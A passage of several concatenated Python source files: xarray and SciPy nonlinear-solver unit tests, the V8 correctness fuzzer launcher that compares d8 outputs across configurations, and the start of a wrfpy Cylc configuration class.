and 'axis' arguments can be supplied. If neither are supplied, then
`std` is calculated over axes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
**kwargs : dict
Additional keyword arguments passed on to the appropriate array
function for calculating `std` on this object's data.
Returns
-------
reduced : DataArray
New DataArray object with `std` applied to its data and the
indicated dimension(s) removed.
"""
    )
    assert actual == expected
def test_datetime_to_numeric_datetime64():
    """datetime_to_numeric converts datetime64 arrays, with and without an
    explicit offset, and honours a requested output dtype."""
    times = pd.date_range("2000", periods=5, freq="7D").values

    # Default offset: hours since the first timestamp.
    converted = duck_array_ops.datetime_to_numeric(times, datetime_unit="h")
    np.testing.assert_array_equal(converted, 24 * np.arange(0, 35, 7))

    # Explicit offset shifts the origin to the second timestamp.
    converted = duck_array_ops.datetime_to_numeric(
        times, offset=times[1], datetime_unit="h"
    )
    np.testing.assert_array_equal(converted, 24 * np.arange(-7, 28, 7))

    # Requested dtype is applied to the result.
    out_dtype = np.float32
    converted = duck_array_ops.datetime_to_numeric(
        times, datetime_unit="h", dtype=out_dtype
    )
    np.testing.assert_array_equal(converted, 24 * np.arange(0, 35, 7).astype(out_dtype))
@requires_cftime
def test_datetime_to_numeric_cftime():
    """Same checks as the datetime64 variant, but for cftime objects."""
    times = cftime_range("2000", periods=5, freq="7D").values

    # Default offset: hours since the first timestamp.
    converted = duck_array_ops.datetime_to_numeric(times, datetime_unit="h")
    np.testing.assert_array_equal(converted, 24 * np.arange(0, 35, 7))

    # Explicit offset shifts the origin to the second timestamp.
    converted = duck_array_ops.datetime_to_numeric(
        times, offset=times[1], datetime_unit="h"
    )
    np.testing.assert_array_equal(converted, 24 * np.arange(-7, 28, 7))

    # Requested dtype is applied to the result.
    out_dtype = np.float32
    converted = duck_array_ops.datetime_to_numeric(
        times, datetime_unit="h", dtype=out_dtype
    )
    np.testing.assert_array_equal(converted, 24 * np.arange(0, 35, 7).astype(out_dtype))
| |
""" Unit tests for nonlinear solvers
Author: Ondrej Certik
May 2007
"""
from __future__ import division, print_function, absolute_import
from numpy.testing import assert_, dec, TestCase, run_module_suite
from scipy.lib.six import xrange
from scipy.optimize import nonlin, root
from numpy import matrix, diag, dot
from numpy.linalg import inv
import numpy as np
from test_minpack import pressure_network
# All nonlinear solvers under test, keyed by the method name accepted by
# scipy.optimize.root.
SOLVERS = {'anderson': nonlin.anderson, 'diagbroyden': nonlin.diagbroyden,
'linearmixing': nonlin.linearmixing, 'excitingmixing': nonlin.excitingmixing,
'broyden1': nonlin.broyden1, 'broyden2': nonlin.broyden2,
'krylov': nonlin.newton_krylov}
# Subset of SOLVERS that must converge on every test problem; the others are
# allowed to fail on problems listed in each problem's KNOWN_BAD dict.
MUST_WORK = {'anderson': nonlin.anderson, 'broyden1': nonlin.broyden1,
'broyden2': nonlin.broyden2, 'krylov': nonlin.newton_krylov}
#-------------------------------------------------------------------------------
# Test problems
#-------------------------------------------------------------------------------
def F(x):
    """Test problem f(x) = -D*x - c*(x'x)*x with diagonal D; root at 0."""
    col = np.matrix(x).T
    damp = matrix(diag([3, 2, 1.5, 1, 0.5]))
    c = 0.01
    return -damp * col - c * float(col.T * col) * col


F.xin = [1, 1, 1, 1, 1]
F.KNOWN_BAD = {}
def F2(x):
    """Identity map: the only root is the zero vector."""
    return x


F2.xin = [1, 2, 3, 4, 5, 6]
F2.KNOWN_BAD = {'linearmixing': nonlin.linearmixing,
                'excitingmixing': nonlin.excitingmixing}
def F3(x):
    """Affine test problem: A*x - b for a fixed tridiagonal A."""
    coeff = np.matrix('-2 1 0; 1 -2 1; 0 1 -2')
    rhs = np.matrix('1 2 3')
    return np.dot(coeff, x) - rhs


F3.xin = [1, 2, 3]
F3.KNOWN_BAD = {}
def F4_powell(x):
    """Powell's badly scaled function (two equations, scale factor 1e4)."""
    scale = 1e4
    eq1 = scale * x[0] * x[1] - 1
    eq2 = np.exp(-x[0]) + np.exp(-x[1]) - (1 + 1 / scale)
    return [eq1, eq2]


F4_powell.xin = [-1, -2]
F4_powell.KNOWN_BAD = {'linearmixing': nonlin.linearmixing,
                       'excitingmixing': nonlin.excitingmixing,
                       'diagbroyden': nonlin.diagbroyden}
def F5(x):
    """Four-node pressure network problem from the minpack tests."""
    flows = np.array([.5, .5, .5, .5])
    return pressure_network(x, 4, flows)


F5.xin = [2., 0, 2, 0]
F5.KNOWN_BAD = {'excitingmixing': nonlin.excitingmixing,
                'linearmixing': nonlin.linearmixing,
                'diagbroyden': nonlin.diagbroyden}
def F6(x):
    """Preconditioned two-variable problem: -J0^{-1} applied to the residual."""
    x1, x2 = x
    jac0 = np.array([[-4.256, 14.7],
                     [0.8394989, 0.59964207]])
    residual = np.array([(x1 + 3) * (x2**5 - 7) + 3*6,
                         np.sin(x2 * np.exp(x1) - 1)])
    return -np.linalg.solve(jac0, residual)


F6.xin = [-0.5, 1.4]
F6.KNOWN_BAD = {'excitingmixing': nonlin.excitingmixing,
                'linearmixing': nonlin.linearmixing,
                'diagbroyden': nonlin.diagbroyden}
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
class TestNonlin(object):
    """
    Check the Broyden methods for a few test problems.

    broyden1, broyden2, and newton_krylov must succeed for
    all functions. Some of the others don't -- tests in KNOWN_BAD are skipped.
    """

    def _check_nonlin_func(self, f, func, f_tol=1e-2):
        # Solve f(x) = 0 with the given solver and verify the residual norm.
        x = func(f, f.xin, f_tol=f_tol, maxiter=200, verbose=0)
        assert_(np.absolute(f(x)).max() < f_tol)

    def _check_root(self, f, method, f_tol=1e-2):
        # Same residual check, but driven through the unified `root` interface.
        res = root(f, f.xin, method=method,
                   options={'ftol': f_tol, 'maxiter': 200, 'disp': 0})
        assert_(np.absolute(res.fun).max() < f_tol)

    @dec.knownfailureif(True)
    def _check_func_fail(self, *a, **kw):
        # Yielded for KNOWN_BAD solver/problem pairs that are also in
        # MUST_WORK, so the failure is recorded as "known" instead of passing
        # silently.
        pass

    def test_problem_nonlin(self):
        """ Tests for nonlin functions """
        # Nose-style generator test: one sub-test per (problem, solver) pair.
        for f in [F, F2, F3, F4_powell, F5, F6]:
            for func in SOLVERS.values():
                if func in f.KNOWN_BAD.values():
                    if func in MUST_WORK.values():
                        yield self._check_func_fail, f, func
                    continue
                yield self._check_nonlin_func, f, func

    def test_problem_root(self):
        """ Tests for root """
        # Same matrix of sub-tests, via scipy.optimize.root method names.
        for f in [F, F2, F3, F4_powell, F5, F6]:
            for meth in SOLVERS:
                if meth in f.KNOWN_BAD:
                    if meth in MUST_WORK:
                        yield self._check_func_fail, f, meth
                    continue
                yield self._check_root, f, meth
class TestSecant(TestCase):
    """Check that some Jacobian approximations satisfy the secant condition"""

    # Fixed sequence of iterates and their residuals f(x) = x**2 - 1.
    xs = [np.array([1,2,3,4,5], float),
          np.array([2,3,4,5,1], float),
          np.array([3,4,5,1,2], float),
          np.array([4,5,1,2,3], float),
          np.array([9,1,9,1,3], float),
          np.array([0,1,9,1,3], float),
          np.array([5,5,7,1,1], float),
          np.array([1,2,7,5,1], float),]
    fs = [x**2 - 1 for x in xs]

    def _check_secant(self, jac_cls, npoints=1, **kw):
        """
        Check that the given Jacobian approximation satisfies secant
        conditions for last `npoints` points.
        """
        jac = jac_cls(**kw)
        jac.setup(self.xs[0], self.fs[0], None)
        for j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
            jac.update(x, f)

            # Secant condition: J^{-1} df == dx for the last `npoints` steps.
            for k in xrange(min(npoints, j+1)):
                dx = self.xs[j-k+1] - self.xs[j-k]
                df = self.fs[j-k+1] - self.fs[j-k]
                assert_(np.allclose(dx, jac.solve(df)))

            # Check that the `npoints` secant bound is strict
            if j >= npoints:
                dx = self.xs[j-npoints+1] - self.xs[j-npoints]
                df = self.fs[j-npoints+1] - self.fs[j-npoints]
                assert_(not np.allclose(dx, jac.solve(df)))

    def test_broyden1(self):
        self._check_secant(nonlin.BroydenFirst)

    def test_broyden2(self):
        self._check_secant(nonlin.BroydenSecond)

    def test_broyden1_update(self):
        # Check that BroydenFirst update works as for a dense matrix
        jac = nonlin.BroydenFirst(alpha=0.1)
        jac.setup(self.xs[0], self.fs[0], None)

        # Reference: explicit dense Broyden "good" update of B ≈ J.
        B = np.identity(5) * (-1/0.1)

        for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
            df = f - self.fs[last_j]
            dx = x - self.xs[last_j]
            B += (df - dot(B, dx))[:,None] * dx[None,:] / dot(dx, dx)
            jac.update(x, f)
            assert_(np.allclose(jac.todense(), B, rtol=1e-10, atol=1e-13))

    def test_broyden2_update(self):
        # Check that BroydenSecond update works as for a dense matrix
        jac = nonlin.BroydenSecond(alpha=0.1)
        jac.setup(self.xs[0], self.fs[0], None)

        # Reference: explicit dense Broyden "bad" update of H ≈ J^{-1}.
        H = np.identity(5) * (-0.1)

        for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
            df = f - self.fs[last_j]
            dx = x - self.xs[last_j]
            H += (dx - dot(H, df))[:,None] * df[None,:] / dot(df, df)
            jac.update(x, f)
            assert_(np.allclose(jac.todense(), inv(H), rtol=1e-10, atol=1e-13))

    def test_anderson(self):
        # Anderson mixing (with w0=0) satisfies secant conditions
        # for the last M iterates, see [Ey]_
        #
        # .. [Ey] V. Eyert, J. Comp. Phys., 124, 271 (1996).
        self._check_secant(nonlin.Anderson, M=3, w0=0, npoints=3)
class TestLinear(TestCase):
    """Solve a linear equation;
    some methods find the exact solution in a finite number of steps"""

    def _check(self, jac, N, maxiter, complex=False, **kw):
        # Solve A x = b with `jac` within `maxiter` iterations; line search
        # disabled so the iteration count bound is exact.
        np.random.seed(123)

        A = np.random.randn(N, N)
        if complex:
            A = A + 1j*np.random.randn(N, N)
        b = np.random.randn(N)
        if complex:
            b = b + 1j*np.random.randn(N)

        def func(x):
            return dot(A, x) - b

        sol = nonlin.nonlin_solve(func, np.zeros(N), jac, maxiter=maxiter,
                                  f_tol=1e-6, line_search=None, verbose=0)
        assert_(np.allclose(dot(A, sol), b, atol=1e-6))

    def test_broyden1(self):
        # Broyden methods solve linear systems exactly in 2*N steps
        self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, False)
        self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, True)

    def test_broyden2(self):
        # Broyden methods solve linear systems exactly in 2*N steps
        self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, False)
        self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, True)

    def test_anderson(self):
        # Anderson is rather similar to Broyden, if given enough storage space
        self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, False)
        self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, True)

    def test_krylov(self):
        # Krylov methods solve linear systems exactly in N inner steps
        self._check(nonlin.KrylovJacobian, 20, 2, False, inner_m=10)
        self._check(nonlin.KrylovJacobian, 20, 2, True, inner_m=10)
class TestJacobianDotSolve(object):
    """Check that solve/dot methods in Jacobian approximations are consistent"""

    def _func(self, x):
        # Test function whose Jacobian mixes a diagonal and a dense part.
        return x**2 - 1 + np.dot(self.A, x)

    def _check_dot(self, jac_cls, complex=False, tol=1e-6, **kw):
        # Cross-check every pair of operations the approximation exposes
        # (matvec/solve/rmatvec/rsolve and the dense __array__ form).
        np.random.seed(123)

        N = 7

        def rand(*a):
            q = np.random.rand(*a)
            if complex:
                q = q + 1j*np.random.rand(*a)
            return q

        def assert_close(a, b, msg):
            d = abs(a - b).max()
            f = tol + abs(b).max()*tol
            if d > f:
                raise AssertionError('%s: err %g' % (msg, d))

        self.A = rand(N, N)

        # initialize
        x0 = np.random.rand(N)
        jac = jac_cls(**kw)
        jac.setup(x0, self._func(x0), self._func)

        # check consistency
        for k in xrange(2*N):
            v = rand(N)

            # Dense reference, only available if the class exposes __array__.
            if hasattr(jac, '__array__'):
                Jd = np.array(jac)
                if hasattr(jac, 'solve'):
                    Gv = jac.solve(v)
                    Gv2 = np.linalg.solve(Jd, v)
                    assert_close(Gv, Gv2, 'solve vs array')
                if hasattr(jac, 'rsolve'):
                    Gv = jac.rsolve(v)
                    Gv2 = np.linalg.solve(Jd.T.conj(), v)
                    assert_close(Gv, Gv2, 'rsolve vs array')
                if hasattr(jac, 'matvec'):
                    Jv = jac.matvec(v)
                    Jv2 = np.dot(Jd, v)
                    assert_close(Jv, Jv2, 'dot vs array')
                if hasattr(jac, 'rmatvec'):
                    Jv = jac.rmatvec(v)
                    Jv2 = np.dot(Jd.T.conj(), v)
                    assert_close(Jv, Jv2, 'rmatvec vs array')

            # matvec and solve must be mutual inverses (likewise the
            # transposed pair).
            if hasattr(jac, 'matvec') and hasattr(jac, 'solve'):
                Jv = jac.matvec(v)
                Jv2 = jac.solve(jac.matvec(Jv))
                assert_close(Jv, Jv2, 'dot vs solve')

            if hasattr(jac, 'rmatvec') and hasattr(jac, 'rsolve'):
                Jv = jac.rmatvec(v)
                Jv2 = jac.rmatvec(jac.rsolve(Jv))
                assert_close(Jv, Jv2, 'rmatvec vs rsolve')

            # Advance the approximation to a new random point.
            x = rand(N)
            jac.update(x, self._func(x))

    def test_broyden1(self):
        self._check_dot(nonlin.BroydenFirst, complex=False)
        self._check_dot(nonlin.BroydenFirst, complex=True)

    def test_broyden2(self):
        self._check_dot(nonlin.BroydenSecond, complex=False)
        self._check_dot(nonlin.BroydenSecond, complex=True)

    def test_anderson(self):
        self._check_dot(nonlin.Anderson, complex=False)
        self._check_dot(nonlin.Anderson, complex=True)

    def test_diagbroyden(self):
        self._check_dot(nonlin.DiagBroyden, complex=False)
        self._check_dot(nonlin.DiagBroyden, complex=True)

    def test_linearmixing(self):
        self._check_dot(nonlin.LinearMixing, complex=False)
        self._check_dot(nonlin.LinearMixing, complex=True)

    def test_excitingmixing(self):
        self._check_dot(nonlin.ExcitingMixing, complex=False)
        self._check_dot(nonlin.ExcitingMixing, complex=True)

    def test_krylov(self):
        # Krylov approximation is iterative; allow a looser tolerance.
        self._check_dot(nonlin.KrylovJacobian, complex=False, tol=1e-4)
        self._check_dot(nonlin.KrylovJacobian, complex=True, tol=1e-4)
class TestNonlinOldTests(TestCase):
    """ Test case for a simple constrained entropy maximization problem
    (the machine translation example of Berger et al in
    Computational Linguistics, vol 22, num 1, pp 39--72, 1996.)
    """

    # Each test runs a fixed iteration budget on problem F and checks both
    # the solution norm and the residual norm against historical thresholds.

    def test_broyden1(self):
        x = nonlin.broyden1(F,F.xin,iter=12,alpha=1)
        assert_(nonlin.norm(x) < 1e-9)
        assert_(nonlin.norm(F(x)) < 1e-9)

    def test_broyden2(self):
        x = nonlin.broyden2(F,F.xin,iter=12,alpha=1)
        assert_(nonlin.norm(x) < 1e-9)
        assert_(nonlin.norm(F(x)) < 1e-9)

    def test_anderson(self):
        # Anderson converges more slowly here; only a loose bound is checked.
        x = nonlin.anderson(F,F.xin,iter=12,alpha=0.03,M=5)
        assert_(nonlin.norm(x) < 0.33)

    def test_linearmixing(self):
        x = nonlin.linearmixing(F,F.xin,iter=60,alpha=0.5)
        assert_(nonlin.norm(x) < 1e-7)
        assert_(nonlin.norm(F(x)) < 1e-7)

    def test_exciting(self):
        x = nonlin.excitingmixing(F,F.xin,iter=20,alpha=0.5)
        assert_(nonlin.norm(x) < 1e-5)
        assert_(nonlin.norm(F(x)) < 1e-5)

    def test_diagbroyden(self):
        x = nonlin.diagbroyden(F,F.xin,iter=11,alpha=1)
        assert_(nonlin.norm(x) < 1e-8)
        assert_(nonlin.norm(F(x)) < 1e-8)

    # The same checks, driven through the scipy.optimize.root interface.

    def test_root_broyden1(self):
        res = root(F, F.xin, method='broyden1',
                   options={'nit': 12, 'jac_options': {'alpha': 1}})
        assert_(nonlin.norm(res.x) < 1e-9)
        assert_(nonlin.norm(res.fun) < 1e-9)

    def test_root_broyden2(self):
        res = root(F, F.xin, method='broyden2',
                   options={'nit': 12, 'jac_options': {'alpha': 1}})
        assert_(nonlin.norm(res.x) < 1e-9)
        assert_(nonlin.norm(res.fun) < 1e-9)

    def test_root_anderson(self):
        res = root(F, F.xin, method='anderson',
                   options={'nit': 12,
                            'jac_options': {'alpha': 0.03, 'M': 5}})
        assert_(nonlin.norm(res.x) < 0.33)

    def test_root_linearmixing(self):
        res = root(F, F.xin, method='linearmixing',
                   options={'nit': 60,
                            'jac_options': {'alpha': 0.5}})
        assert_(nonlin.norm(res.x) < 1e-7)
        assert_(nonlin.norm(res.fun) < 1e-7)

    def test_root_excitingmixing(self):
        res = root(F, F.xin, method='excitingmixing',
                   options={'nit': 20,
                            'jac_options': {'alpha': 0.5}})
        assert_(nonlin.norm(res.x) < 1e-5)
        assert_(nonlin.norm(res.fun) < 1e-5)

    def test_root_diagbroyden(self):
        res = root(F, F.xin, method='diagbroyden',
                   options={'nit': 11,
                            'jac_options': {'alpha': 1}})
        assert_(nonlin.norm(res.x) < 1e-8)
        assert_(nonlin.norm(res.fun) < 1e-8)
# Allow running this test module directly (legacy numpy.testing runner).
if __name__ == "__main__":
    run_module_suite()
| |
#!/usr/bin/env python
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
V8 correctness fuzzer launcher script.
"""
import argparse
import hashlib
import itertools
import json
import os
import re
import sys
import traceback
import v8_commands
import v8_suppressions
# d8 flag sets for each comparison configuration. Two configurations are run
# on the same test case and their outputs are diffed; '--turbo-filter=~' plus
# '--noopt' restricts execution to the interpreter.
CONFIGS = dict(
default=[
'--suppress-asm-messages',
],
ignition=[
'--turbo-filter=~',
'--noopt',
'--suppress-asm-messages',
],
ignition_asm=[
'--turbo-filter=~',
'--noopt',
'--validate-asm',
'--stress-validate-asm',
'--suppress-asm-messages',
],
ignition_eager=[
'--turbo-filter=~',
'--noopt',
'--no-lazy',
'--no-lazy-inner-functions',
'--suppress-asm-messages',
],
ignition_turbo=[
'--suppress-asm-messages',
],
ignition_turbo_opt=[
'--always-opt',
'--suppress-asm-messages',
],
ignition_turbo_opt_eager=[
'--always-opt',
'--no-lazy',
'--no-lazy-inner-functions',
'--suppress-asm-messages',
],
)
# Timeout in seconds for one d8 run.
TIMEOUT = 3

# Return codes.
RETURN_PASS = 0
RETURN_FAIL = 2

# Directory containing this script; used to resolve bundled helper files.
BASE_PATH = os.path.dirname(os.path.abspath(__file__))

# JS files prepended to every test case (builtin mocks and suppressions).
PREAMBLE = [
os.path.join(BASE_PATH, 'v8_mock.js'),
os.path.join(BASE_PATH, 'v8_suppressions.js'),
]
# Extra mocks added only when the two runs use different architectures.
ARCH_MOCKS = os.path.join(BASE_PATH, 'v8_mock_archs.js')

# Flags shared by both configurations in every run.
FLAGS = ['--abort_on_stack_or_string_length_overflow', '--expose-gc',
'--allow-natives-syntax', '--invoke-weak-callbacks', '--omit-quit',
'--es-staging']

SUPPORTED_ARCHS = ['ia32', 'x64', 'arm', 'arm64']

# Output for suppressed failure case.
FAILURE_HEADER_TEMPLATE = """#
# V8 correctness failure
# V8 correctness configs: %(configs)s
# V8 correctness sources: %(source_key)s
# V8 correctness suppression: %(suppression)s
"""

# Extended output for failure case. The 'CHECK' is for the minimizer.
FAILURE_TEMPLATE = FAILURE_HEADER_TEMPLATE + """#
# CHECK
#
# Compared %(first_config_label)s with %(second_config_label)s
#
# Flags of %(first_config_label)s:
%(first_config_flags)s
# Flags of %(second_config_label)s:
%(second_config_flags)s
#
# Difference:
%(difference)s
#
# Source file:
%(source)s
#
### Start of configuration %(first_config_label)s:
%(first_config_output)s
### End of configuration %(first_config_label)s
#
### Start of configuration %(second_config_label)s:
%(second_config_output)s
### End of configuration %(second_config_label)s
"""

# Matches fuzzer-generated test case file names.
FUZZ_TEST_RE = re.compile(r'.*fuzz(-\d+\.js)')
# Matches the marker line naming the original source file of a test case.
SOURCE_RE = re.compile(r'print\("v8-foozzie source: (.*)"\);')

# The number of hex digits used from the hash of the original source file path.
# Keep the number small to avoid duplicate explosion.
ORIGINAL_SOURCE_HASH_LENGTH = 3

# Placeholder string if no original source file could be determined.
ORIGINAL_SOURCE_DEFAULT = 'none'
def infer_arch(d8):
  """Infer the V8 architecture from the build configuration next to the
  executable.
  """
  config_path = os.path.join(os.path.dirname(d8), 'v8_build_config.json')
  with open(config_path) as config_file:
    cpu = json.load(config_file)['v8_target_cpu']
  # The build config says 'x86'; the rest of this script calls it 'ia32'.
  if cpu == 'x86':
    return 'ia32'
  return cpu
def parse_args():
  """Parse and validate command-line options.

  Returns the argparse namespace, augmented with `first_arch`/`second_arch`
  inferred from the build configs next to each d8 binary. Asserts (i.e.
  aborts) on any invalid combination.
  """
  parser = argparse.ArgumentParser()
  parser.add_argument(
    '--random-seed', type=int, required=True,
    help='random seed passed to both runs')
  parser.add_argument(
    '--first-config', help='first configuration', default='ignition')
  parser.add_argument(
    '--second-config', help='second configuration', default='ignition_turbo')
  parser.add_argument(
    '--first-d8', default='d8',
    help='optional path to first d8 executable, '
    'default: bundled in the same directory as this script')
  parser.add_argument(
    '--second-d8',
    help='optional path to second d8 executable, default: same as first')
  parser.add_argument('testcase', help='path to test case')
  options = parser.parse_args()

  # Ensure we have a test case.
  assert (os.path.exists(options.testcase) and
          os.path.isfile(options.testcase)), (
      'Test case %s doesn\'t exist' % options.testcase)

  # Use first d8 as default for second d8.
  options.second_d8 = options.second_d8 or options.first_d8

  # Ensure absolute paths.
  if not os.path.isabs(options.first_d8):
    options.first_d8 = os.path.join(BASE_PATH, options.first_d8)
  if not os.path.isabs(options.second_d8):
    options.second_d8 = os.path.join(BASE_PATH, options.second_d8)

  # Ensure executables exist.
  assert os.path.exists(options.first_d8)
  assert os.path.exists(options.second_d8)

  # Infer architecture from build artifacts.
  options.first_arch = infer_arch(options.first_d8)
  options.second_arch = infer_arch(options.second_d8)

  # Ensure we make a sane comparison: identical runs would trivially agree.
  assert (options.first_arch != options.second_arch or
          options.first_config != options.second_config), (
      'Need either arch or config difference.')
  assert options.first_arch in SUPPORTED_ARCHS
  assert options.second_arch in SUPPORTED_ARCHS
  assert options.first_config in CONFIGS
  assert options.second_config in CONFIGS
  return options
def get_meta_data(content):
  """Extracts original-source-file paths from test case content."""
  matches = (SOURCE_RE.match(line) for line in content.splitlines())
  return {'sources': [match.group(1) for match in matches if match]}
def content_bailout(content, ignore_fun):
  """Print failure state and return if ignore_fun matches content."""
  # ignore_fun returns a bug/suppression label (or None) for known-bad input.
  bug = (ignore_fun(content) or '').strip()
  if bug:
    print FAILURE_HEADER_TEMPLATE % dict(
        configs='', source_key='', suppression=bug)
    return True
  return False
def pass_bailout(output, step_number):
  """Print info and return if in timeout or crash pass states."""
  if output.HasTimedOut():
    # Dashed output, so that no other clusterfuzz tools can match the
    # words timeout or crash.
    print '# V8 correctness - T-I-M-E-O-U-T %d' % step_number
    return True
  if output.HasCrashed():
    print '# V8 correctness - C-R-A-S-H %d' % step_number
    return True
  return False
def fail_bailout(output, ignore_by_output_fun):
  """Print failure state and return if ignore_by_output_fun matches output."""
  # The suppression function inspects raw stdout and returns a bug label
  # (or None) if the difference is known to be benign.
  bug = (ignore_by_output_fun(output.stdout) or '').strip()
  if bug:
    print FAILURE_HEADER_TEMPLATE % dict(
        configs='', source_key='', suppression=bug)
    return True
  return False
def main():
  """Run the test case under both configurations and diff their output.

  Returns RETURN_PASS when the outputs agree (or a known-benign state was
  hit), RETURN_FAIL when a genuine difference is reported.
  """
  options = parse_args()

  # Suppressions are architecture and configuration specific.
  suppress = v8_suppressions.get_suppression(
      options.first_arch, options.first_config,
      options.second_arch, options.second_config,
  )

  # Static bailout based on test case content or metadata.
  with open(options.testcase) as f:
    content = f.read()
  if content_bailout(get_meta_data(content), suppress.ignore_by_metadata):
    return RETURN_FAIL
  if content_bailout(content, suppress.ignore_by_content):
    return RETURN_FAIL

  # Set up runtime arguments.
  common_flags = FLAGS + ['--random-seed', str(options.random_seed)]
  first_config_flags = common_flags + CONFIGS[options.first_config]
  second_config_flags = common_flags + CONFIGS[options.second_config]

  def run_d8(d8, config_flags):
    # Architecture mocks are only needed for cross-arch comparisons.
    preamble = PREAMBLE[:]
    if options.first_arch != options.second_arch:
      preamble.append(ARCH_MOCKS)
    args = [d8] + config_flags + preamble + [options.testcase]
    print " ".join(args)
    if d8.endswith('.py'):
      # Wrap with python in tests.
      args = [sys.executable] + args
    return v8_commands.Execute(
        args,
        cwd=os.path.dirname(options.testcase),
        timeout=TIMEOUT,
    )

  first_config_output = run_d8(options.first_d8, first_config_flags)

  # Early bailout based on first run's output.
  if pass_bailout(first_config_output, 1):
    return RETURN_PASS

  second_config_output = run_d8(options.second_d8, second_config_flags)

  # Bailout based on second run's output.
  if pass_bailout(second_config_output, 2):
    return RETURN_PASS

  difference, source = suppress.diff(
      first_config_output.stdout, second_config_output.stdout)

  if source:
    # Short hash of the original source path groups duplicates on the
    # clusterfuzz side.
    source_key = hashlib.sha1(source).hexdigest()[:ORIGINAL_SOURCE_HASH_LENGTH]
  else:
    source = ORIGINAL_SOURCE_DEFAULT
    source_key = ORIGINAL_SOURCE_DEFAULT

  if difference:
    # Only bail out due to suppressed output if there was a difference. If a
    # suppression doesn't show up anymore in the statistics, we might want to
    # remove it.
    if fail_bailout(first_config_output, suppress.ignore_by_output1):
      return RETURN_FAIL
    if fail_bailout(second_config_output, suppress.ignore_by_output2):
      return RETURN_FAIL

    # The first three entries will be parsed by clusterfuzz. Format changes
    # will require changes on the clusterfuzz side.
    first_config_label = '%s,%s' % (options.first_arch, options.first_config)
    second_config_label = '%s,%s' % (options.second_arch, options.second_config)
    print (FAILURE_TEMPLATE % dict(
        configs='%s:%s' % (first_config_label, second_config_label),
        source_key=source_key,
        suppression='',  # We can't tie bugs to differences.
        first_config_label=first_config_label,
        second_config_label=second_config_label,
        first_config_flags=' '.join(first_config_flags),
        second_config_flags=' '.join(second_config_flags),
        first_config_output=
            first_config_output.stdout.decode('utf-8', 'replace'),
        second_config_output=
            second_config_output.stdout.decode('utf-8', 'replace'),
        source=source,
        difference=difference.decode('utf-8', 'replace'),
    )).encode('utf-8', 'replace')
    return RETURN_FAIL

  # TODO(machenbach): Figure out if we could also return a bug in case there's
  # no difference, but one of the line suppressions has matched - and without
  # the match there would be a difference.
  print '# V8 correctness - pass'
  return RETURN_PASS
# Entry point: translate every failure mode into a clusterfuzz-friendly
# header plus a process return code.
if __name__ == "__main__":
  try:
    result = main()
  except SystemExit:
    # Make sure clusterfuzz reports internal errors and wrong usage.
    # Use one label for all internal and usage errors.
    print FAILURE_HEADER_TEMPLATE % dict(
        configs='', source_key='', suppression='wrong_usage')
    result = RETURN_FAIL
  except MemoryError:
    # Running out of memory happens occasionally but is not actionable.
    print '# V8 correctness - pass'
    result = RETURN_PASS
  except Exception as e:
    print FAILURE_HEADER_TEMPLATE % dict(
        configs='', source_key='', suppression='internal_error')
    print '# Internal error: %s' % e
    traceback.print_exc(file=sys.stdout)
    result = RETURN_FAIL
  sys.exit(result)
| |
#!/usr/bin/env python
'''
description: Configuration part of wrfpy
license: APACHE 2.0
author: Ronald van Haren, NLeSC (r.vanharen@esciencecenter.nl)
'''
from wrfpy.config import config
from wrfpy import utils
import os
from distutils.dir_util import copy_tree
import pkg_resources
class configuration(config):
    def __init__(self, results):
        """Dispatch on the parsed CLI options dict `results`: 'init' creates
        the Cylc suite directory structure, 'create' writes the suite.rc."""
        global logger
        # Log to ~/wrfpy.log regardless of working directory.
        logger = utils.start_logging(os.path.join(os.path.expanduser("~"),
                                     'wrfpy.log'))
        if results['init']:
            self._create_directory_structure(results['suitename'],
                                             results['basedir'])
        elif results['create']:
            self._create_cylc_config(results['suitename'],
                                     results['basedir'])
def _create_directory_structure(self, suitename, basedir=None):
'''
Create directory structure for the Cylc configuration
'''
# set basedir to users home directory if not supplied
if not basedir:
basedir = os.path.join(os.path.expanduser("~"), 'cylc-suites')
# subdirectories to create
subdirs = ['bin', 'control', 'doc', 'inc']
# create subdirectories
[utils._create_directory(
os.path.join(basedir, suitename, subdir))
for subdir in subdirs]
# copy over helper scripts for cylc
cylcDir = pkg_resources.resource_filename('wrfpy', 'cylc/')
targetDir = os.path.join(basedir, suitename, 'bin')
copy_tree(cylcDir, targetDir)
# create empty json config file in suite directory
# this does not overwrite an existing config file
config.__init__(self, os.path.join(
basedir, suitename, 'config.json'))
    def _create_cylc_config(self, suitename, basedir):
        '''
        Create cylc suite.rc configuration file based on config.json
        '''
        # Re-read the suite's json config so cycle lengths are current.
        config.__init__(self, os.path.join(
            basedir, suitename, 'config.json'))
        self.incr_hour = self.config['options_general']['run_hours']
        self.wps_interval_hours = self.config['options_wps']['run_hours']
        # Assemble the suite.rc from its four sections, in file order.
        suiterc = self._header()
        suiterc += self._scheduling()
        suiterc += self._runtime()
        suiterc += self._visualization()
        self._write(suiterc, os.path.join(basedir, suitename, 'suite.rc'))
    def _header(self):
        '''
        define suite.rc header information

        Returns the Jinja2 preamble that sets the START and STOP cycle
        points from the configured start/end dates.
        '''
        start_time = utils.datetime_to_string(
            utils.return_validate(self.config[
                'options_general']['date_start']),
            format='%Y%m%dT%H')
        end_time = utils.datetime_to_string(
            utils.return_validate(self.config['options_general']['date_end']),
            format='%Y%m%dT%H')
        # define template; doubled braces emit literal Jinja2 {% set %} tags
        template = """#!Jinja2
{{% set START = "{start_time}" %}}
{{% set STOP = "{end_time}" %}}
"""
        # context variables in template
        context = {
            "start_time": start_time,
            "end_time": end_time
        }
        return template.format(**context)
    def _scheduling(self):
        '''
        define suite.rc scheduling information

